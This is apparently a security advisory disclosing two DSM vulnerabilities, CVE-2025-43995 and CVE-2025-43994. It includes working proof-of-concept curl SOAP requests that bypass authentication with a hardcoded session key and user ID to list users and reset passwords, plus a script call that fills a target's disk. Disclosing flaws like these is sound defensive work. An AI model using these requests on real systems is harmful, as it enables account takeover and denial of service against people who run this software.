CVE-2025-43995: Authentication Bypass in DSM Data Collector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An unauthenticated remote attacker can access APIs exposed by ApiProxy.war in DataCollectorEar.ear by using a special SessionKey and UserId.
It's been observed that the ApiSession identified by an integer key of 1 seems to be present in the "sessionHash" regardless of whether any user is currently or was previously logged into the Web GUI of the application.
Additionally, it appears that there are some special users used in the application. These are masterUser (id 434223), rmsUser (id 434224), and smisUser (id 434225).
By specifying a <SessionKey>1</SessionKey> and <UserId>434223</UserId> in a SOAP message sent to endpoint /CompellentApiServices/CompellentAPIServices, the attacker can access (without authentication) a large set of APIs, including changing an existing DSM user's password.
Proof of Concept
# Get existing users
# - user id identified by InstanceId and user name by InstanceName
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="<http://schemas.xmlsoap.org/soap/envelope/>" xmlns:web="<http://WebServer.WebServices.compellent.com/>"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>GetList</Command><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' '<https://<target-host>>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Instance(Id|Name)>.*?/Instance(Id|Name)>'
InstanceId>434226</InstanceId>
InstanceName>dsmuser</InstanceName>
# Change password for the user identified by the InstanceId 434226 to "Password123" (without quotes)
# - Modify <InstanceId> and <NewPassword> as needed
# - NOTE:
# --- NewPassword cannot be the same as the old one
# --- NewPassword may need to meet the password min/max length and/or complexity rules
#
curl -sk -H 'Content-Type:text/xml' -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://WebServer.WebServices.compellent.com/"><soapenv:Header/><soapenv:Body><web:ApiCommand><arg0><![CDATA[<compapi><ObjectEncodeType>Xml</ObjectEncodeType><Async>false</Async><Object>EmUser</Object><CommandType>Method</CommandType><Command>ChangePassword</Command><Attributes><InstanceId>434226</InstanceId><NewPassword>Password123</NewPassword></Attributes><ApiConnection><SessionKey>1</SessionKey><UserId>434223</UserId></ApiConnection></compapi>]]></arg0></web:ApiCommand></soapenv:Body></soapenv:Envelope>' 'https://<target-host>:3033/CompellentApiServices/CompellentAPIServices' | grep -P -o 'Successful>.*/Successful>'
Successful>True</Successful>
CVE-2025-43994: Unauthenticated Large Directory Creation in DSM Server Agent (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
The DSM Server Agent allows an unauthenticated remote attacker to create a directory tree structure with the size specified by the attacker on the host running the agent. This could allow the attacker to fill up a disk drive, potentially leading to DoS.
Proof of Concept
python3 dsm_server_agent_create_space.py -t <target-host> -p 27355 -s 1000
Creating a directory tree of 1000 MB in C:\ on the remote host
Sending:
<em_sa_xml><Command>Create</Command><Arguments><DriveOrMountPoint>C:\</DriveOrMountPoint><FreePercent>0</FreePercent><SizeMB>1000</SizeMB></Arguments><ObjectType>CreateSpace</ObjectType></em_sa_xml>
Received:
<em_sa_xml>
<BaseProcess>
<Index>638868988165592124</Index>
<ProcessName>[Process638868988165592124]CreateSpaceProcess</ProcessName>
<CurrentProgress>0</CurrentProgress>
<TotalProgress>10</TotalProgress>
<CurrentProgress2>0</CurrentProgress2>
<TotalProgress2>0</TotalProgress2>
<State>1</State>
<StateStr>NotStarted</StateStr>
<Message></Message>
<MessageId></MessageId>
<Message2Id></Message2Id>
<MessageParams></MessageParams>
<Message2Params></Message2Params>
</BaseProcess>
</em_sa_xml>
Contact our sales team